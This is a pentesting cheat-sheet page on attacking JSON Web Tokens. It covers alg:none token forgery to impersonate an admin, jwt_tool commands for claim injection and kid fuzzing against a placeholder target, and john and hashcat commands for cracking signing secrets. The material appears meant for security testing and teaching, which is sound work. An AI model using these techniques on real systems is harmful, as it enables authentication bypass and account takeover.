Exploit Notes

JWT (Json Web Token) Pentesting

Last modified: 2023-03-20


JWT is a proposed internet standard for creating data with optional signature and optional encryption whose payload holds JSON that asserts some number of claims.

Decode JWT

  • There are some online JWT decoder/encoder tools like JWT.io.
  • CyberChef can be used for JWT decode.

Manipulate JWT

If the website uses JWT and we can see the token, copy the JWT and paste it in jwt.io.

  1. Replace the “alg” value with “none” in header. (try the alg header variations such as “none”, “None”, “nOnE”, “NONE”.)
  2. Replace arbitrary values of the payload e.g. “username” with “admin”.
  3. Empty the signature field.

If the error “Invalid Signature” occured, we can manually create Base64 value for each section.
If you want to empty the signature field manually, you can delete the final section.
For example,


Now copy the JWT.
Go to the website and replace the original JWT with the new one in HTTP header.


JWT Toolkit is a toolkit for testing, tweaking and cracking JWT.


python jwt_tool.py <Base64_Encoded_JWT>


# -t: Target URL
# -rc: Cookies
# -M pb: Playbook Scan Mode
# -cv: Canary Value
python jwt_tool.py -t https://vulnerable.com/admin -rc "jwt=<Base64_Encoded_JWT>;anothercookie=test" -M pb -cv "not authorized"


# -X i: Exploit (inject inline)
# -I -pc username -pv admin: Inject Claim ("username": admin)
python jwt_tool.py -t https://vulnerable.com/admin -rc "jwt=<Base64_Encoded_JWT>;anothercookie=test" -X i -I -pc username -pv admin


# -I -hc kid -hv wordlist.txt: Inject Claim ("kid": FUZZ)
python jwt_tool.py -t https://vulnerable.com/admin -rc "jwt=<Base64_Encoded_JWT>;anothercookie=test" -I -hc kid -hv wordlist.txt

Manual Pentesting

# Tamper (Manual Exploit)
python jwt_tool.py <Base64_Encoded_JWT> -T

# Exploit (Automated Exploit)
# -X a: Exploit (alg: none)
python jwt_tool.py <Base64_Encoded_JWT> -X a

Crack JWT Secret

First of all, you need to put the JWT into the text file.

echo -n '<Base64_Encoded_JWT>' > jwt.txt

Then crack the hash using John the Ripper or Hashcat.

john --format=HMAC-SHA256 --wordlist=/usr/share/wordlists/rockyou.txt jwt.txt

hashcat -a 0 -m 16500 jwt.txt passwords.txt
hashcat -a 0 -m 16500 jwt.txt passwords.txt -r rules/best64.rule
hashcat -a 3 -m 16500 jwt.txt '?u?l?l?l?l?l?l?l' -i --increment-min=6

If you found a secret, you can create a new JWT using the secret on tools like JWT.io.

Also we can use jwt-cracker.

Tools by HDKS


Automatic web fuzzer.


Auto reconnaissance CLI.

Hash Cracker

Hash identifier.